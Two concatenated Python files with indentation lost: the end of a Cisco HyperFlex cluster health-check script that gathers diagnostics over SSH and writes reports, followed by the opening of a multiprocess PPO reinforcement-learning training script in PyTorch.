usg = m.group(1)
if int(usg) <= 80:
tmpUsageCheck = "PASS"
else:
tmpUsageCheck = "FAIL"
opd.update({"Check /tmp usage": tmpUsageCheck})
except Exception:
pass
# 15) Micron 5100 Drive Firmware Check
mfwcheck = ""
micronbug = ""
try:
cmd = "esxcli storage core device list"
op = execmd(cmd)
mflag1 = mflag2 = 0
for line in op:
if "Model:" in line and "Micron_5100" in line:
mflag1 = 1
mflag2 = 0
mfwcheck = "PASS"
continue
elif mflag1 == 1 and "Revision:" in line:
mflag1 = 0
mflag2 = 1
if mflag2 == 1 and "U049" in line:
micronbug = "Please Refer: https://tinyurl.com/vqnytww"
mfwcheck = "FAIL"
break
if micronbug != "":
opd.update({"Micron 5100 Drive Firmware Check": micronbug})
except Exception:
pass
# 16) Run lsusb when USB0 Check Fails
global lsusbCheck
if lsusbCheck:
try:
cmd = "lsusb"
op = execmd(cmd)
except Exception:
pass
# Update Test Detail
nwtestdetail.update({esxip: opd})
# Close connection
client.close()
# Test summary
# HX User Account check
nwtestsum[esxip]["HX User Account check"] = {"Status": hxac, "Result": "Checks if HXUSER is present."}
# vMotion enabled check
nwtestsum[esxip]["vMotion enabled check"] = {"Status": esx_vmotion[esxip]["vmotion"], "Result": "Checks if vMotion is enabled on the host."}
# vMotion reachability check: Removed
# Check for HX down during upgrade
#nwtestsum[esxip]["Check for HX down during upgrade"] = check_HX_down_status[:4]
if check_HX_down_status == "FAIL":
nwtestsum[esxip]["Check for ESXI Failback timer"] = {"Status": check_HX_down_status,
"Result": "If Failed, Change the failback timer to 30secs:" + "\na)For ESXi 6.5: 'esxcfg-advcfg -s 30000 /Net/TeamPolicyUpDelay'\nb)For ESXi 6.7: 'netdbg vswitch runtime set TeamPolicyUpDelay 30000'"}
else:
nwtestsum[esxip]["Check for ESXI Failback timer"] = {"Status": check_HX_down_status, "Result": "Checks for ESXi FAILBACK timer set to 30000ms."}
# Check vmk1 ping to eth1
if vmkpingchk:
if "FAIL" in vmkpingchk:
nwtestsum[esxip]["Check vmk1 ping to eth1"] = {"Status": "FAIL",
"Result": "If Failed, Perform manual vmkping between ESXi vmk1 and SCVM eth1."}
else:
nwtestsum[esxip]["Check vmk1 ping to eth1"] = {"Status": "PASS",
"Result": "Checks Network between ESXi vmk1 and SCVM eth1."}
# No extra controller vm folders check
nwtestsum[esxip]["No extra controller vm folders check"] = {"Status": vmfld[:4], "Result": "Checks for duplicate Controller SCVM Folders."}
# VMware Tools location check
nwtestsum[esxip]["VMware Tools location check"] = {"Status": vmtoolcheck, "Result": "Checks for Non default VMware Tools location."}
# vfat Disk Usage check
nwtestsum[esxip]["vfat Disk Usage check"] = {"Status": vfatcheck, "Result": "Checks for vfat Disk Usage."}
# Check /tmp usage
if tmpUsageCheck == "FAIL":
nwtestsum[esxip]["Check /tmp usage"] = {"Status": tmpUsageCheck, "Result": "Please ensure usage of /tmp is less than 80%."}
else:
nwtestsum[esxip]["Check /tmp usage"] = {"Status": tmpUsageCheck, "Result": "Checking for /tmp usage."}
# Micron 5100 Drive Firmware Check
if mfwcheck:
nwtestsum[esxip]["Micron 5100 Drive Firmware Check"] = {"Status": mfwcheck, "Result": micronbug}
except Exception as e:
msg = "\r\nNot able to establish SSH connection to ESX Host: " + esxip + "\r"
log_msg(INFO, msg)
#log_msg("", msg)
log_msg(ERROR, str(e) + "\r")
def create_sub_report(ip):
# create HX controller report file
global subreportfiles
filename = "HX_Report_" + str(ip) +".txt"
subreportfiles.append(filename)
with open(filename, "w") as fh:
fh.write("\t\t\t HX Health Check " + str(toolversion))
fh.write("\r\n")
fh.write("\t\t\tHX Controller: " + ip)
fh.write("\r\n")
fh.write("\t\t\tHX Hostname: " + hostd[ip].get("hostname", ""))
fh.write("\r\n")
fh.write("#" * 80)
fh.write("\r\n")
n = 1
for cname in testdetail[ip].keys():
fh.write("\r\n" + str(n) + ") " + cname + ":")
fh.write("\r\n")
tw = PrettyTable(hrules=ALL)
tw.field_names = ["Name", "Status", "Comments"]
tw.align = "l"
for k, v in testdetail[ip][cname].items():
if type(v) == list:
tw.add_row([k, "\n".join(v), ""])
elif type(v) == dict:
tw.add_row([k, v["Status"], v["Result"]])
else:
tw.add_row([k, v, ""])
fh.write((str(tw)).replace("\n", "\r\n"))
fh.write("\r\n")
n += 1
#print("\r\nSub Report File: " + filename)
log_msg(INFO, "Sub Report File: " + filename + "\r")
def display_result():
# Display the test results
if arg == "detail":
print("")
for ip in testdetail.keys():
print("\r\n\t\t\tHX Controller: " + ip)
print("#"*80)
n = 1
for cname in testdetail[ip].keys():
print("\r\n" + str(n) + ") " + cname)
td = PrettyTable(hrules=ALL)
td.field_names = ["Name", "Status", "Comments"]
td.align = "l"
for k, v in testdetail[ip][cname].items():
if type(v) == list:
td.add_row([k, "\n".join(v), ""])
elif type(v) == dict:
td.add_row([k, v["Status"], v["Result"]])
else:
td.add_row([k, v, ""])
print(td)
time.sleep(5)
n += 1
print("\r\n" + "#" * 80)
print("\r\t\t\tNetwork check:")
print("\r" + "#" * 80)
print("\r\nESX vmk0: " + ", ".join(esx_hostsl) + "\r")
print("\r\nESX vmk1: " + ", ".join(vmk1_list) + "\r")
print("\r\nSCVM eth0: " + ", ".join(eth0_list) + "\r")
print("\r\nSCVM eth1: " + ", ".join(eth1_list) + "\r")
for eip in nwtestdetail.keys():
print("\r\nESX Host: " + eip)
ed = PrettyTable(hrules=ALL)
ed.field_names = ["Command/Condition", "Response/Status", "Comments"]
ed.align = "l"
for k, v in nwtestdetail[eip].items():
if type(v) == list:
ed.add_row([k, "\n".join(v), ""])
elif type(v) == dict:
ed.add_row([k, v["Status"], v["Result"]])
else:
ed.add_row([k, v, ""])
print(ed)
time.sleep(5)
# Bug details table
print("\n\nBugs Detail:")
print(bgt)
time.sleep(5)
else:
print("")
for ip in testsum.keys():
print("\r\nHX Controller: " + ip)
print("\rTest Summary:")
ts = PrettyTable(hrules=ALL)
ts.field_names = ["Name", "Result", "Comments"]
ts.align = "l"
for k, v in testsum[ip].items():
if type(v) == list:
ts.add_row([k, "\n".join(v), ""])
elif type(v) == dict:
ts.add_row([k, v["Status"], v["Result"]])
else:
ts.add_row([k, v, ""])
print(ts)
print("\r\n" + "#" * 80)
print("\r\t\t\tNetwork check:")
print("\r" + "#" * 80)
print("\r\nESX vmk0: " + ", ".join(esx_hostsl) + "\r")
print("\r\nESX vmk1: " + ", ".join(vmk1_list) + "\r")
print("\r\nSCVM eth0: " + ", ".join(eth0_list) + "\r")
print("\r\nSCVM eth1: " + ", ".join(eth1_list) + "\r")
for eip in nwtestsum.keys():
print("\r\nESX Host: " + eip)
es = PrettyTable(hrules=ALL)
es.field_names = ["Name", "Result", "Comments"]
es.align = "l"
for k, v in nwtestsum[eip].items():
if type(v) == list:
es.add_row([k, "\n".join(v), ""])
elif type(v) == dict:
es.add_row([k, v["Status"], v["Result"]])
else:
es.add_row([k, v, ""])
print(es)
def create_main_report(clusterName, clusterType):
global sedflag
# create main report file
filename = "HX_Tool_Main_Report_" + get_date_time() + ".txt"
with open(filename, "w") as fh:
fh.write("\t\t\tHX Health Check " + str(toolversion))
fh.write("\r\n")
fh.write("\t\t\t:HX Tool Main Report:")
fh.write("\r\n")
fh.write("#" * 80)
fh.write("\r\n")
fh.write("\r\nCluster Name: " + str(clusterName.strip()))
fh.write("\r\n")
fh.write("\r\nCluster Type: " + str(clusterType.strip()).upper())
fh.write("\r\n")
fh.write("\r\nHX Cluster Nodes:")
fh.write("\r\n")
fh.write((str(ht)).replace("\n", "\r\n"))
fh.write("\r\n")
fh.write("\r\n")
# Each HX Node Report
for ip in hxips:
fh.write("\r\n")
fh.write("#" * 80)
fh.write("\r\n")
fh.write("\t\t\tHX Controller: " + ip)
fh.write("\r\n")
fh.write("\t\t\tHX Hostname: " + hostd[ip].get("hostname", ""))
fh.write("\r\n")
fh.write("#" * 80)
fh.write("\r\n")
n = 1
try:
for cname in testdetail[ip].keys():
fh.write("\r\n" + str(n) + ") " + cname + ":")
fh.write("\r\n")
tw = PrettyTable(hrules=ALL)
tw.field_names = ["Name", "Status", "Comments"]
tw.align = "l"
for k, v in testdetail[ip][cname].items():
if type(v) == list:
tw.add_row([k, "\n".join(v), ""])
elif type(v) == dict:
tw.add_row([k, v["Status"], v["Result"]])
else:
tw.add_row([k, v, ""])
fh.write((str(tw)).replace("\n", "\r\n"))
fh.write("\r\n")
n += 1
except Exception:
continue
with open(filename, "a") as fh:
fh.write("\r\n")
fh.write("#" * 80)
fh.write("\r\n")
fh.write("\r\n\t\t\t Network check:" + "\r")
fh.write("\r\n")
fh.write("#" * 80)
fh.write("\r\n")
fh.write("vmk0: " + ", ".join(esx_hostsl))
fh.write("\r\n")
fh.write("vmk1: " + ", ".join(vmk1_list))
fh.write("\r\n")
fh.write("eth0: " + ", ".join(eth0_list))
fh.write("\r\n")
fh.write("eth1: " + ", ".join(eth1_list))
fh.write("\r\n")
for host in sorted(nwtestdetail.keys()):
fh.write("\r\nESX Host: " + host + "\r")
t4 = PrettyTable(hrules=ALL)
t4.field_names = ["Command", "Response", "Comments"]
t4.align = "l"
for k, v in nwtestdetail[host].items():
if type(v) == list:
t4.add_row([k, "\n".join(v), ""])
else:
t4.add_row([k, v, ""])
fh.write("\r\n")
fh.write((str(t4)).replace("\n", "\r\n"))
fh.write("\r\n")
fh.write("\r\n")
fh.write("\r\nRelease Notes:" + "\r\n")
fh.write("https://www.cisco.com/c/en/us/support/hyperconverged-systems/hyperflex-hx-data-platform-software/products-release-notes-list.html" + "\r\n")
fh.write("\r\nUpgrade Guides:" + "\r\n")
fh.write("https://www.cisco.com/c/en/us/support/hyperconverged-systems/hyperflex-hx-data-platform-software/products-installation-guides-list.html" + "\r\n")
fh.write("\r\n")
fh.write("\r\nNote:" + "\r\n")
fh.write("1) If upgrading to HX 4.0(2a), please review the following link and perform workaround – https://tinyurl.com/wc7j5qp" + "\r\n")
fh.write("2) Please check the status of Compute nodes manually, script only verifies the config on the converged nodes." + "\r\n")
fh.write("3) Hypercheck doesnot perform FAILOVER TEST, so please ensure that the upstream is configured for network connectivity for JUMBO or NORMAL MTU size as needed." + "\r\n")
if sedNote:
fh.write("4) SED Drive Failure Might Cause Cluster to Go Down - https://www.cisco.com/c/en/us/support/docs/field-notices/702/fn70234.html" + "\r\n")
fh.write("\r\n")
print("\r\nMain Report File: " + filename)
log_stop()
create_tar_file()
print("\r\nRelease Notes:")
print("\rhttps://www.cisco.com/c/en/us/support/hyperconverged-systems/hyperflex-hx-data-platform-software/products-release-notes-list.html")
print("\r\nUpgrade Guides:")
print("\rhttps://www.cisco.com/c/en/us/support/hyperconverged-systems/hyperflex-hx-data-platform-software/products-installation-guides-list.html")
print("\r\nNote:")
print("\r1) If upgrading to HX 4.0(2a), please review the following link and perform workaround – https://tinyurl.com/wc7j5qp")
print("\r2) Please check the status of Compute nodes manually, script only verifies the config on the converged nodes.")
print("\r3) Hypercheck doesnot perform FAILOVER TEST, so please ensure that the upstream is configured for network connectivity for JUMBO or NORMAL MTU size as needed.")
if sedNote:
print("\r4) SED Drive Failure Might Cause Cluster to Go Down - https://www.cisco.com/c/en/us/support/docs/field-notices/702/fn70234.html")
print("\r\n")
def create_json_file(clusterName, clusterType):
filename = "HX_Tool_Summary.json"
data = {}
data["Cluster Name"] = str(clusterName.strip())
data["Cluster Type"] = str(clusterType.strip())
data["HX Checks"] = testsum
data["NW Checks"] = nwtestsum
with open(filename, "w") as fh:
json.dump(data, fh)
def create_tar_file():
file = dir_name + ".tar"
try:
os.chdir("..")
tar = tarfile.open(file, "w")
tar.add(dir_name)
tar.close()
print("Report tar file: " + str(file))
# Copy file to /var/log/springpath
path = r"/var/log/springpath/"
shutil.copy(file, path)
print("Report file copied to path: /var/log/springpath")
except Exception as e:
print("Not able to create the Report tar file")
print(e)
###############################################################################
# Main Starts here
###############################################################################
if __name__ == "__main__":
# HX Script version
# Arguments passed
arg = ""
if len(sys.argv) > 1:
try:
arg = (sys.argv[1]).lower()
except Exception:
pass
if arg == "-h" or arg == "--help" or arg == "help":
print("\n\t\t HX Health Check " + str(toolversion))
print("\nSupported HX Versions: 1.8, 2.6, 3.0, 3.5, 4.0")
print("\nPre-requisite: Script needs HX and ESXi root password information to check all conditions.")
print("\nHX Health Check script will do below checks on each cluster nodes:")
print("\t 1) Cluster services check")
print("\t 2) ZooKeeper & Exhibitor check")
print("\t 3) HDD health check")
print("\t 4) Pre-Upgrade Check")
print("\t 5) Network check ")
print("\nFor Test Summary report run as below:")
print("\t python HXTool.py")
print("\nFor Test detail report run as below:")
print("\t python HXTool.py detail\n")
sys.exit(0)
# Log file declaration
log_file = "HX_Tool_" + get_date_time() + ".log"
log_name = "HX_TOOL"
log_start(log_file, log_name, INFO)
# RSA_KEY_FILE = "/etc/ssh/ssh_host_rsa_key"
print("\n\t\t HX Health Check " + str(toolversion))
log_msg(INFO, "HX Health Check " + str(toolversion) + "\r")
hxcdt = datetime.datetime.now()
bdt = datetime.datetime.strptime(builddate, "%Y-%m-%d")
ndays = (hxcdt - bdt).days
if int(ndays) >= 30:
print("\n The script in use might be old. Please check and confirm that this is the latest script on Github.")
# HX Controller parameter
print("\nPlease enter below info of HX-Cluster:")
hxusername = "root"
log_msg(INFO, "Username: " + hxusername + "\r")
hxpassword = getpass.getpass("Enter the HX-Cluster Root Password: ")
esxpassword = getpass.getpass("Enter the ESX Root Password: ")
port = 22
log_msg(INFO, "Port: " + str(port) + "\r")
time_out = 30 # Number of seconds for timeout
log_msg(INFO, "Timeout: " + str(time_out) + "\r")
# Get Host IP Address of eth1
# cmd = "hostname -i"
cmd = "ifconfig eth1 | grep 'inet addr:' | cut -d: -f2| cut -d' ' -f1"
op = runcmd(cmd)
hostip = op.strip()
log_msg(INFO, "Host IP Address: " + str(hostip) + "\r")
# Get Host Path
cmd = "pwd"
op = runcmd(cmd)
hostpath = op.strip()
log_msg(INFO, "Host Path: " + str(hostpath) + "\r")
log_msg(INFO, "Argument: " + str(arg) + "\r")
if arg == "detail":
print("Option: " + str(arg))
# Get Cluster Name
print("")
clustername = ""
clusterType = ""
cmd = "stcli cluster storage-summary --detail | grep -i name | cut -d: -f2"
op = runcmd(cmd)
if "Not able to run the command" in op:
pass
else:
clustername = op.strip()
log_msg(INFO, "Cluster Name: " + str(clustername) + "\r")
log_msg("", "Cluster Name: " + str(clustername) + "\r")
# Get Cluster Type
cmd = "stcli cluster info | grep -i clustertype | head -1 | cut -d: -f2"
op = runcmd(cmd)
if op:
clusterType = op.strip()
# Check Stretch Cluster
stcnt = ""
cmd = "find / -name stretch* | wc -l"
cop = runcmd(cmd)
if "Not able to run the command" in cop:
pass
else:
stcnt = cop.strip()
if stcnt.isdigit():
if int(stcnt) > 0:
clusterType = "STRETCH_CLUSTER"
log_msg(INFO, "Cluster Type: " + str(clusterType) + "\r")
if clusterType:
print("")
log_msg("", "Cluster Type: " + str(clusterType).upper() + "\r")
# Set Stretch Cluster
stretchCluster = False
if "stretch" in clusterType.lower():
stretchCluster = True
# Get Controller Mgmnt IP Addresses
# Old cmd used to get controller IP Addresses
# cmd1 = "stcli cluster info | grep -i stctl_mgmt -n1 | grep -i addr"
# Get eth1 ips
cmd = "sysmtool --ns cluster --cmd info | grep -i uuid"
op = runcmd(cmd)
ips = []
if op:
ips = re.findall(r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", op)
if not ips:
print("HX Nodes IP Addresses are not found")
sys_exit(0)
ips.sort(key=lambda ip: map(int, reversed(ip.split('.'))))
log_msg(INFO, "IP Adresses: " + ", ".join(ips) + "\r")
eth1_list = list(ips)
eth1_list.sort(key=lambda ip: map(int, reversed(ip.split('.'))))
# Get all hostnames
hostd = {}
subreportfiles = []
print("")
# global sedflag
#############################################################
# Get Controller eth0 ips or storage controller ips
hxips = []
eth0_list = []
# Create instance of SSHClient object
client = paramiko.SSHClient()
# Automatically add untrusted hosts (Handle SSH Exception for unknown host)
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Check HX and ESX root Password
check_psd(ips, hxusername, hxpassword, esxpassword, time_out)
# Get all hostnames and HX IP address using threads
# <hostname -i> cmd is not working
try:
ipthreads = []
for ip in ips:
th = threading.Thread(target=thread_geteth0ip, args=(ip, hxusername, hxpassword, time_out,))
th.start()
time.sleep(12)
ipthreads.append(th)
for t in ipthreads:
t.join()
hxips.sort(key=lambda ip: map(int, reversed(ip.split('.'))))
except Exception:
hxips = eth1_list
hxips = eth1_list
log_msg(INFO, "HX IP Adresses: " + ", ".join(hxips) + "\r")
#############################################################
# Create instance of SSHClient object
client = paramiko.SSHClient()
# Automatically add untrusted hosts (Handle SSH Exception for unknown host)
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Get hostname, eth1, esxip using threads
threads = []
for ip in hxips:
th = threading.Thread(target=thread_sshconnect, args=(ip, hxusername, hxpassword, time_out,))
th.start()
time.sleep(35)
threads.append(th)
for t in threads:
t.join()
# Get all timestamp using threads
tsthreads = []
tsstart = datetime.datetime.now().replace(microsecond=0)
for ip in hxips:
th = threading.Thread(target=thread_timestamp, args=(ip, hxusername, hxpassword, time_out,))
th.start()
time.sleep(5)
tsthreads.append(th)
for t in tsthreads:
t.join()
tsend = datetime.datetime.now().replace(microsecond=0)
timedelay = (tsend - tsstart).seconds
log_msg(INFO, "Time delay for Timestamp check: " + str(timedelay) + "\r")
ht = PrettyTable(hrules=ALL)
ht.field_names = ["Nodes", "IP Address", "HostName"]
ht.align = "l"
for i, ip in enumerate(hxips):
ht.add_row([i + 1, hostd[ip].get("eth0", ""), hostd[ip].get("hostname", "")])
print("\r\nHX Cluster Nodes:")
print(ht)
print("")
# NTP Date check
# timestamp should be same on all storage controllers
dtresult = ""
for ip in hostd.keys():
hostd[ip]["date check"] = dtresult
try:
d = hostd[ip]["date"]
if d == "":
dtresult = "FAIL"
else:
ipdt = datetime.datetime.strptime(d, "%m/%d/%y %H:%M:%S")
for jp in hostd.keys():
if ip == jp:
continue
else:
jd = hostd[jp]["date"]
if jd == "":
dtresult = "FAIL"
continue
else:
jpdt = datetime.datetime.strptime(jd, "%m/%d/%y %H:%M:%S")
if ipdt == jpdt:
dtresult = "PASS"
continue
elif ipdt > jpdt:
t = (ipdt - jpdt).seconds
else:
t = (jpdt - ipdt).seconds
if t > timedelay:
dtresult = "FAIL"
break
else:
dtresult = "PASS"
hostd[ip]["date check"] = dtresult
except Exception:
continue
# NTP source ip address check
# it should be same on all storage controllers
ntpsrccheck = ""
for ip in hostd.keys():
ipntp = hostd[ip]["ntp source"]
if ipntp == "":
ntpsrccheck = "FAIL"
else:
for jp in hostd.keys():
if ip == jp:
continue
elif ipntp == hostd[jp]["ntp source"]:
ntpsrccheck = "PASS"
else:
ntpsrccheck = "FAIL"
break
hostd[ip].update({"ntp source check": ntpsrccheck})
# Check package & versions on each controller
packagecheck = ""
# First will count no of packages on each controller
for ip in hostd.keys():
ipkgl = hostd[ip]["package & versions"]
if ipkgl:
cnt = len(ipkgl)
for jp in hostd.keys():
if ip == jp:
continue
elif cnt == len(hostd[jp]["package & versions"]):
packagecheck = "PASS"
else:
packagecheck = "FAIL"
break
break
else:
packagecheck = "FAIL"
break
# Now will check package and version on each controller
if packagecheck == "PASS":
for ip in hostd.keys():
ipkgl = hostd[ip]["package & versions"]
for pk in ipkgl:
pkg = ""
ver = ""
l = pk.split()
try:
pkg = l[0]
ver = l[1]
except Exception:
pass
for jp in hostd.keys():
if ip == jp:
continue
elif packagecheck == "FAIL":
break
else:
jpkgl = hostd[jp]["package & versions"]
for line in jpkgl:
if pkg in line:
if ver in line:
packagecheck = "PASS"
else:
packagecheck = "FAIL"
break
if packagecheck == "FAIL":
break
if packagecheck == "FAIL":
break
for ip in hostd.keys():
hostd[ip]["check package & versions"] = packagecheck
# check Iptables count
# check for at least 44 and same across all nodes
iptst = ""
for ip in hostd.keys():
try:
ipcnt = int(hostd[ip]["iptables count"])
except Exception:
continue
if ipcnt < 44:
iptst = "FAIL"
break
elif iptst == "FAIL":
break
else:
for jp in hostd.keys():
try:
jpcnt = int(hostd[jp]["iptables count"])
except Exception:
continue
if jpcnt < 44:
iptst = "FAIL"
break
elif ip == jp:
continue
elif ipcnt == jpcnt:
iptst = "PASS"
else:
iptst = "FAIL"
break
for ip in hostd.keys():
hostd[ip]["check iptables"] = iptst
# Check keystore file
keystoreCheck = ""
keystoreList = []
for ip in hostd.keys():
keystore = hostd[ip]["keystore"]
if keystore not in keystoreList:
keystoreList.append(keystore)
if len(keystoreList) == 1:
keystoreCheck = "PASS"
else:
keystoreCheck = "FAIL"
for ip in hostd.keys():
hostd[ip]["check keystore"] = keystoreCheck
# Check hxuser password having special character
hxpsdcheck = ""
try:
cmd = "/opt/springpath/storfs-support/getEsxConnectionInfo.sh"
op = runcmd(cmd, False)
if "password" in op:
p = re.search(r"password\":\s+\"(.+)\"", op)
if p:
psd = p.group(1)
if re.search(r"(\{[\{\#\%])|//|\\\\|'|\"", psd):
hxpsdcheck = "FAIL"
else:
hxpsdcheck = "PASS"
except Exception:
pass
for ip in hostd.keys():
hostd[ip]["check hxuser password"] = hxpsdcheck
# Get ESX IPs, vmk1 ips
esx_hostsl = []
for ip in hostd.keys():
esxip = hostd[ip].get("esxip", "")
if esxip != "":
esx_hostsl.append(esxip)
if esx_hostsl:
try:
esx_hostsl.sort(key=lambda ip: map(int, reversed(ip.split('.'))))
except Exception:
pass
esx_vmotion = {}
vmk1_mtu = {}
vmk1_list = []
for ip in esx_hostsl:
esx_vmotion[str(ip)] = dict.fromkeys(["vmotion", "vmkip", "mtu"], "")
# Get all vmk1 using threads
threads = []
for ip in hostd.keys():
th = threading.Thread(target=get_vmk1, args=(ip, hxusername, esxpassword, time_out,))
th.start()
time.sleep(5)
threads.append(th)
for t in threads:
t.join()
vmk1_list = [v for v in vmk1_list if v != " "]
if vmk1_list:
try:
vmk1_list.sort(key=lambda ip: map(int, reversed(ip.split('.'))))
except Exception:
pass
log_msg(INFO, "Eth1 IP Adresses: " + ", ".join(eth1_list) + "\r")
log_msg(INFO, "ESX IP Adresses: " + ", ".join(esx_hostsl) + "\r")
log_msg(INFO, "vmk1 IP Adresses: " + ", ".join(vmk1_list) + "\r")
# Check the below things on each controller
nwdetail = OrderedDict()
cvm = {}
testsum = OrderedDict()
testdetail = OrderedDict()
nwtestsum = OrderedDict()
nwtestdetail = OrderedDict()
# Bug details table
bugs = {
"HX down": "HX cluster goes down during the UCS infra upgrade. This is because of the default failback delay interval(10sec) on ESXi." + "\nDefault Value - 10sec" + "\nModify to - 30sec"
}
bgt = PrettyTable(hrules=ALL)
bgt.field_names = ["Bug", "Description"]
bgt.align = "l"
for k, v in bugs.items():
bgt.add_row([k, v])
#############################################################
# Check on all HX Controller
# Create instance of SSHClient object
for ip in hxips:
try:
print("\r\nHX Controller: " + str(ip))
# Initiate SSH Connection
client.connect(hostname=ip, username=hxusername, password=hxpassword, timeout=time_out)
msg = "\r\nSSH connection established to HX Node: " + ip + "\r"
log_msg(INFO, msg)
# log_msg("", msg)
testsum[ip] = OrderedDict()
testdetail[ip] = OrderedDict()
# 1. Cluster services check
# Progressbar
pbar = ProgressBarThread()
pbar.start("Cluster services check ")
log_msg(INFO, "Progressbar Started" + "\r")
cluster_services_check(ip)
# stop progressbar
pbar.stop("COMPLETED")
log_msg(INFO, "Progressbar Stopped" + "\r")
# 2. ZooKeeper and Exhibitor check
# Progressbar
pbar = ProgressBarThread()
pbar.start("ZooKeeper & Exhibitor check")
log_msg(INFO, "Progressbar Started" + "\r")
zookeeper_check(ip)
# stop progressbar
pbar.stop("COMPLETED")
log_msg(INFO, "Progressbar Stopped" + "\r")
# 3. HDD health check
# Progressbar
pbar = ProgressBarThread()
pbar.start("HDD health check ")
log_msg(INFO, "Progressbar Started" + "\r")
hdd_check(ip)
# stop progressbar
pbar.stop("COMPLETED")
log_msg(INFO, "Progressbar Stopped" + "\r")
# 4. Pre-Upgrade Check
# Progressbar
pbar = ProgressBarThread()
pbar.start("Pre-Upgrade Check ")
log_msg(INFO, "Progressbar Started" + "\r")
pre_upgrade_check(ip)
# stop progressbar
pbar.stop("COMPLETED")
log_msg(INFO, "Progressbar Stopped" + "\r")
# 5. Network Summary
# Progressbar
pbar = ProgressBarThread()
pbar.start("Network check ")
log_msg(INFO, "Progressbar Started" + "\r")
network_check(ip)
# stop progressbar
pbar.stop("COMPLETED")
log_msg(INFO, "Progressbar Stopped" + "\r")
# Close connection
client.close()
# Create report file
#create_sub_report(ip)
except KeyboardInterrupt:
sys_exit(0)
except Exception as e:
msg = "\r\nNot able to establish SSH connection to HX Node: " + ip + "\r"
log_msg(INFO, msg)
# log_msg("", msg)
log_msg(ERROR, str(e) + "\r")
# sys_exit(0)
# stop progressbar
pbar.stop("INCOMPLETE")
log_msg(INFO, "Progressbar Stopped" + "\r")
continue
###############################################################
# Display the test result
display_result()
# Create Test Summary json file
create_json_file(clustername, clusterType)
# Create Main Report File
create_main_report(clustername, clusterType)
# End
sys.exit(0)
|
ppo_continuous_multiprocess2.py
|
'''
Multi-processing version of PPO continuous v2
'''
import math
import random
import gym
import numpy as np
import torch
torch.multiprocessing.set_start_method('forkserver', force=True) # critical for make multiprocessing work
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.distributions import Normal, MultivariateNormal
from IPython.display import clear_output
import matplotlib.pyplot as plt
from matplotlib import animation
from IPython.display import display
from reacher import Reacher
import argparse
import time
import torch.multiprocessing as mp
from torch.multiprocessing import Process
from multiprocessing import Process, Manager
from multiprocessing.managers import BaseManager
import threading as td
GPU = True
device_idx = 0
if GPU:
device = torch.device("cuda:" + str(device_idx) if torch.cuda.is_available() else "cpu")
else:
device = torch.device("cpu")
print(device)
parser = argparse.ArgumentParser(description='Train or test neural net motor controller.')
parser.add_argument('--train', dest='train', action='store_true', default=False)
parser.add_argument('--test', dest='test', action='store_true', default=False)
args = parser.parse_args()
##################### hyper parameters ####################
ENV_NAME = 'Pendulum-v0' # environment name
RANDOMSEED = 2 # random seed
EP_MAX = 1000 # total number of episodes for training
EP_LEN = 200 # total number of steps for each episode
GAMMA = 0.9 # reward discount
A_LR = 0.0001 # learning rate for actor
C_LR = 0.0002 # learning rate for critic
BATCH = 256 # update batchsize
A_UPDATE_STEPS = 10 # actor update steps
C_UPDATE_STEPS = 10 # critic update steps
EPS = 1e-8 # numerical residual
MODEL_PATH = 'model/ppo_multi'
NUM_WORKERS=2 # or: mp.cpu_count()
ACTION_RANGE = 2. # if unnormalized, normalized action range should be 1.
METHOD = [
dict(name='kl_pen', kl_target=0.01, lam=0.5), # KL penalty
dict(name='clip', epsilon=0.2), # Clipped surrogate objective, find this is better
][1] # choose the method for optimization
############################### PPO ####################################
class ValueNetwork(nn.Module):
def __init__(self, state_dim, hidden_dim, init_w=3e-3):
super(ValueNetwork, self).__init__()
self.linear1 = nn.Linear(state_dim, hidden_dim)
# self.linear2 = nn.Linear(hidden_dim, hidden_dim)
# self.linear3 = nn.Linear(hidden_dim, hidden_dim)
self.linear4 = nn.Linear(hidden_dim, 1)
# weights initialization
# self.linear4.weight.data.uniform_(-init_w, init_w)
# self.linear4.bias.data.uniform_(-init_w, init_w)
def forward(self, state):
x = F.relu(self.linear1(state))
# x = F.relu(self.linear2(x))
# x = F.relu(self.linear3(x))
x = self.linear4(x)
return x
class PolicyNetwork(nn.Module):
def __init__(self, num_inputs, num_actions, hidden_dim, action_range=1., init_w=3e-3, log_std_min=-20, log_std_max=2):
super(PolicyNetwork, self).__init__()
self.log_std_min = log_std_min
self.log_std_max = log_std_max
self.linear1 = nn.Linear(num_inputs, hidden_dim)
self.linear2 = nn.Linear(hidden_dim, hidden_dim)
# self.linear3 = nn.Linear(hidden_dim, hidden_dim)
# self.linear4 = nn.Linear(hidden_dim, hidden_dim)
self.mean_linear = nn.Linear(hidden_dim, num_actions)
# self.mean_linear.weight.data.uniform_(-init_w, init_w)
# self.mean_linear.bias.data.uniform_(-init_w, init_w)
self.log_std_linear = nn.Linear(hidden_dim, num_actions)
# self.log_std_linear.weight.data.uniform_(-init_w, init_w)
# self.log_std_linear.bias.data.uniform_(-init_w, init_w)
self.num_actions = num_actions
self.action_range = action_range
def forward(self, state):
x = F.relu(self.linear1(state))
x = F.relu(self.linear2(x))
# x = F.relu(self.linear3(x))
# x = F.relu(self.linear4(x))
mean = self.action_range * F.tanh(self.mean_linear(x))
log_std = self.log_std_linear(x)
log_std = torch.clamp(log_std, self.log_std_min, self.log_std_max)
std = log_std.exp()
return mean, std
def get_action(self, state, deterministic=False):
state = torch.FloatTensor(state).unsqueeze(0).to(device)
mean, std = self.forward(state)
if deterministic:
action = mean
else:
pi = torch.distributions.Normal(mean, std)
action = pi.sample()
action = torch.clamp(action, -self.action_range, self.action_range)
return action.squeeze(0)
def sample_action(self,):
a=torch.FloatTensor(self.num_actions).uniform_(-1, 1)
return a.numpy()
class NormalizedActions(gym.ActionWrapper):
def _action(self, action):
low = self.action_space.low
high = self.action_space.high
action = low + (action + 1.0) * 0.5 * (high - low)
action = np.clip(action, low, high)
return action
def _reverse_action(self, action):
low = self.action_space.low
high = self.action_space.high
action = 2 * (action - low) / (high - low) - 1
action = np.clip(action, low, high)
return action
class PPO(object):
'''
PPO class
'''
def __init__(self, state_dim, action_dim, hidden_dim=128, a_lr=3e-4, c_lr=3e-4):
self.actor = PolicyNetwork(state_dim, action_dim, hidden_dim, ACTION_RANGE).to(device)
self.critic = ValueNetwork(state_dim, hidden_dim).to(device)
self.actor_optimizer = optim.Adam(self.actor.parameters(), lr=A_LR)
self.critic_optimizer = optim.Adam(self.critic.parameters(), lr=C_LR)
print(self.actor, self.critic)
